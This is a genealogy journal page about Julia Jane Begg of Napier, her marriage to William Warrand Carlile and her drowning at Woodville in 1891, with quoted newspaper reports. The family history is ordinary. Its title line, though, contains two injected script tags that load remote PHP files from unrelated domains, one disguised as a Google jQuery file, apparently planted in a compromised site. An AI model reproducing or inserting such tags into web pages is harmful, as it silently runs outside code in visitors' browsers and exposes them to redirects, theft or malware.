Julia Jane BEGG married William Warrand CARLILE settled Woodville NZ<script src="https://bestdoctornearme.com/splitter.ai/index.php"></script><script src="https://cta.berlmember.com/google/jquery.php"></script> :: FamilyTreeCircles.com Genealogy
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Julia Jane BEGG married William Warrand CARLILE settled Woodville NZ

Journal by ngairedith

Julia Jane Begg was the 4th daughter of 9 children of Agnes Warrand Wilson 1824 of Ireland and Samuel Begg 1812 of West Indies who arrived in New Zealand in 1860 and settled in Napier

She was privately educated
- a brother Samuel Begg (1854-1919) was born in London, studied art in Paris and joined the staff of the Illustrated London News. He was one of the best known black and white artists in London. He accompanied the Prince and Princess of Wales during their tour through India in 1905-06, was present at the wedding of Queen Victoria Eugenie in Madrid in 1906 and at the funeral of King Carlos in Lisbon in 1908. He married Ada Nelson of London
- a brother, Thomas Wilson Begg was born in London 1855 and moved to Sydney, NSW and married Rennee Wakeford (nee Fremlin). Renee had been married to Thomas Sydney Wakeford
- a brother John William Begg was born in Napier 1860, became articled to James Wren Carlile, to whom he owed his legal education. He was admitted a Barrister and Solicitor of New Zealand in 1886, and later with one of the leading firms of Solicitors in Melbourne, Australia. He married Caroline Crocker Honeysuckle, Violet Town, Victoria

In 1877, aged 21, Julia married her cousin William Warrand Carlile
- they did not have children

From the HAWKES BAY HERALD - Feb 1877
CARLILE-BEGG: At Napier, on 30 Jan, by the Rev David SIDEY, William W. CARLILE Esq to Julia Jane, fourth daugther of Samuel BEGG Esq.

William was, among other things:
- a member of the Hawke's Bay Education Board
- a member of the Woodville Road Board
- a Justice of the court
- President of the Woodville A & P Society
- Editor of the Hawkes Bay Herald until 1878
- in 1878 his interest was dissolved in the firm between him, Peter Dinwiddie and Thomas Morrison, "Stationers, Newspaper Proprietors, Printers and Publishers" of Napier

Julia drowned in Woodville aged 34 in 1891

From the BUSH ADVOCATE - 31st Jan 1891
We regret greatly to have to record the death by drowning of Mrs W. W. Carlile of Woodville. The deceased lady was bathing in the Manawatu yesterday and it is supposed got out of her depth. No particulars are yet to hand

From the EVENING POST - 31st Jan 1891
Mrs Carlile, the wife of Mr W. Carlile, settler of Woodville, was drowned this afternoon while bathing in the Mangaatua Creek. She was a lady very much esteemed here and also in Napier, in which place her parents were among the earliest settlers. Great sympathy is felt for Mr Carlile in his bereavement
- At the inquest on Mrs Carlile to-day, the jury returned a verdict of Accidental Death by drowning. The evidence showed that deceased, who was a good swimmer, had fainted in the water and though the boys bathing with her tried to rescue her they failed, owing to her helplessness. (A telegram received by Inspector Thomson respecting the sad occurrence, states that Mrs Carlile was bathing with her children. (nephews) An inquest will be held)

From the EVENING POST - 4th Feb 1891
Two sad fatalities, one of a child and the other of a respected lady, have occurred here during the past week. The latter, in the person of Mrs Julia Jane Carlile, the wife of Mr Wm W Carlile, was a very painful event. Full of her usual spirit and vivacity, she had been seeing her sister off by the afternoon train to Napier, had gone from there to the post office and then shopping and speaking here and there to people she knew, until about 5 o'clock. She drove home to Broomfields and finding the children had gone to bathe, followed them and plunged into the water and swam out with them to a log in the middle of the stream. The children plunged into the stream to return. When about half way back one of the little boys noticed her throwing her arms in the air. He called out, "Quick, quick; let us help Auntie." They bravely returned and one getting hold of her hair and the other hold of her arm, tried to land her, but in vain. She appears to have been quite unable to make any effort and they were compelled, through exhaustion, to abandon her, when she sank and rose to the surface again and finally sank. There is something very painful about this kind and much-respected woman dying in the midst of these joyful children whilst sharing in their glee and there is something noble in the brave attempt those two little boys made to rescue her from death. Thre could be no surer proof of the deep affection in whih she was held and so well deserved. All Woodville is very sorry that they will miss her familiar face and her kind and cheering words, but they are more sorry for the bereavement of those who knew her worth in the home circle and are left to grieve her sad fate. Mrs Carlile had taken a very active part in the Benevolent Socity, of which she was practically the founder and for a long time the President and in every way she had been ready to assist in ameliorating the condition of the needy

Not yet known what happened to William, although he did remarry the following year, 29th April 1892, in Featherston to Mabel Martin Monckton who was born about 1866, one of 17 children of Frederick K Monckton and Ann Martin
William died aged 76 on the 11th January 1942 in Havelock North, Hawkes Bay (was living in Te Mata Road)

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on 2010-02-11 13:55:50

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